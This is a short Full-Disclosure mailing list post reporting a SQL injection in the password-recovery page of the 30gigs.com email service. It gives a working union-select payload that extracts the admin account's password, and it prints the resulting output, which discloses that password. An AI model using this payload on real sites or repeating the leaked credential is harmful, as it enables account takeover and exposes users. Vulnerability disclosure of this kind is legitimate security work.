I found a sql injection vulnerability, which leads to password disclosure in 30gigs.com email service.
The vulnerability exists in http://www.30gigs.com/getpassword/ page due to lack of validation of user submitted data.
Proof of Concept:
enter http://www.30gigs.com/getpassword/
and copy & paster this code in the Login field, finally submit the form.

not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin

it will give an output like below, in which "runsit" corresponds to the password of account "admin"
We have sent the password for your not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='[EMAIL PROTECTED] account to runsit

The site has been notified about the vulnerability 2 weeks ago, but no response was taken.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to